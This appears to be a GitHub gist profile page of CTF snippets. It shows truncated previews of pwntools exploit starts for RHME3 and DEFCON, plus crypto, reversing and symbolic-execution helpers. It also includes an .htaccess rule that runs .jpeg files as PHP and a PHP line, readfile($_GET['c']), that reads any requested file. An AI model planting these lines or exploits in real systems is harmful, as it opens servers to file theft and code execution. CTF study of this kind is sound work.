Skip to content

Instantly share code, notes, and snippets.

Federico Scrinzi volpino

Block or report user

Report or block volpino

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View htaccess
AddType application/x-httpd-php .jpeg
View test_lang.php
<?php echo readfile($_GET["c"]); ?>
@volpino
volpino / rhme3_quals_exploit.py
Created Aug 29, 2017
RHME3 exploit for qualification challenge
View rhme3_quals_exploit.py
from pwn import *
#r = remote('127.0.0.1', 1337)
atoi_system_offset = 58640
r = remote('pwn.rhme.riscure.com', 1337)
# Create player 0
r.recvuntil("Your choice:")
r.send("1\n")
r.send("A" * 0 + "\n")
@volpino
volpino / grid.py
Created May 28, 2016
DEFCON 2016 b3s23
View grid.py
from pwn import *
"""
c6c2XX mov dl, XX
1100011011000010
1100011011000000XXXXXXXX
1100011011000111XXXXXXXX
@volpino
volpino / crypto100.py
Created Oct 18, 2015
hitcon simple crypto
View crypto100.py
import requests
import string
import random
import urllib
def xor(s1, s2):
assert len(s1) == 16 and len(s2) == 16
return "".join([chr(ord(s1[i]) ^ ord(s2[i])) for i in range(16)])
@volpino
volpino / opcodes
Created Sep 22, 2015
Reversing APC cache
View opcodes
Finding entry points
Branch analysis from position: 0
Jump found. Position 1 = -2
filename: /tmp/solve.php
function name: (null)
number of ops: 7
compiled vars: none
line #* E I O op fetch ext return operands
-------------------------------------------------------------------------------------
2 0 E > SEND_VAL 'cache.data'
View klug.c
#include<stdio.h>
#include<stdlib.h>
#include<klee/klee.h>
#include "defs.h"
int main(int argc, const char **argv, const char **envp);
void path_fail();
void count_fail();
void path_key();
View decrypt.py
import struct
import xtea
ciphertext = open("./ciphertext.bin").read()
def dec(word):
return struct.unpack("<I", word)[0]
def chunks(l, n):
for i in xrange(0, len(l), n):
@volpino
volpino / client.py
Created Apr 20, 2015
pctf cryptoserv client
View client.py
from socket import socket
import struct
def q(word):
return struct.pack("<I", word)
message = "\x00\x00\x06\x00AAAA"
message += "\x00\x01\x07\x00AAAA"
message += "\x0c\x00\x00\x00AAAA"
You can’t perform that action at this time.